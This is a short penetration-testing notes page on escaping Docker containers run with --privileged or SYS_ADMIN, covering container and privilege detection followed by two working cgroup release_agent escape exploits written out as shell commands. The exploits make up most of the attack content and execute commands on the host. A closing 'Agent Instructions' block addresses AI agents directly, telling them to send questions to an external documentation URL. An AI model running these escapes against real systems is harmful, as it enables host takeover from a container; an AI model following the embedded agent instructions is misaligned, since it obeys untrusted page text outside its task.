# Docker escape

dockers which running with '--privileged' or '--cap-add=SYS\_ADMIN ' parameters could be exploited to gain access to the underline system from the docker container.

### How can you tell if you’re in a container? <a href="#id-8eb6" id="id-8eb6"></a>

cgroups stands for “control groups.” It is a Linux feature that isolates resource usage and is what Docker uses to isolate containers. You can tell if you are in a container by checking the init process’ control group at `/proc/1/cgroup`. If you are not located inside a container, the control group should be `/`. On the other hand, if you are inside a container, you should see `/docker/CONTAINER_ID` instead.

### How can you tell if a container is privileged? <a href="#e81f" id="e81f"></a>

Once you’ve determined that you are in a container, you need to determine if that container is privileged. The best way to do this is to run a command that requires the `--privileged` flag and see if it succeeds.

For example, you can try to add a dummy interface by using an `iproute2` command. This command requires the `NET_ADMIN` capability, which the container would have if it is privileged:

```
$ ip link add dummy0 type dummy
```

If this command runs successfully, you can conclude that the container has the `NET_ADMIN` capability. `NET_ADMIN` is part of the privileged capabilities set, and containers that don’t have it are not privileged. You can clean up the `dummy0` link after this test by running this command:

```
ip link delete dummy0
```

### Exploit #1

```
# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```

### Exploit #2

```
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 &gt;$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c &gt;$d/release_agent;printf '#!/bin/sh\nps &gt;'&quot;$t/o&quot; &gt;/c;
chmod +x /c;sh -c &quot;echo 0 &gt;$d/w/cgroup.procs&quot;;sleep 1;cat /o
```

### source:

<https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infra.newerasec.com/infrastructure-testing/breakout/docker-escape.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.